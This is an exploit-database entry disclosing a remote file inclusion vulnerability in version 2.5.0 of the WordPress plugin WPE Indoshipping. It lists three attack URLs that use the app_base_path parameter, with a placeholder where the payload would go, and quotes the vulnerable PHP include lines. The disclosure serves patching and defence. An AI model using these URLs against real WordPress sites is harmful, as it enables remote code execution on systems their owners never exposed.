Wordpress Plugin WPE Indoshipping Remote File Inclusion

2013-11-23T00:00:00
ID 1337DAY-ID-21559
Type zdt
Reporter altiiever
Modified 2013-11-23T00:00:00

Description

plugin wpe-indoshipping v2.5.0 RFI vuln#### Usage Info http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/wpe_indoshipping.php?app_base_path=[RFI]

                                        
                                            ```========================================================
[+] Title : Wordpress Plugin WPE Indoshipping Remote File Inclusion
[+] Author : Altiiever
[+] Version : 2.5.0
[+] Download : http://downloads.wordpress.org/plugin/wpe-indoshipping.2.5.0.zip
[+] Vulnerability : RFI
```========================================================

|
| [ Vulnerable ] 
|
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/wpe_indoshipping.php?app_base_path= [cukZ]
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin-functions.php?app_base_path= [cukZ]
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin.php?app_base_path= [cukZ]
|
| [ Bug ]
| 
| [!] wpe_indoshipping.php
|	-include $app_base_path.'admin/admin.php';
| [!] admin-functions.php
|	-include_once $app_base_path.'upload/'.$dbfile;
| [!] admin.php
|	-include $app_base_path.'admin/admin-functions.php';
|	-include $app_base_path.'admin/shipping-manager.php';
|	-include $app_base_path.'admin/form-builder.php';
|	-include $app_base_path.'admin/tools.php';
|	-include $app_base_path.'assets/readme.html';
|

#  0day.today [2018-04-08]  #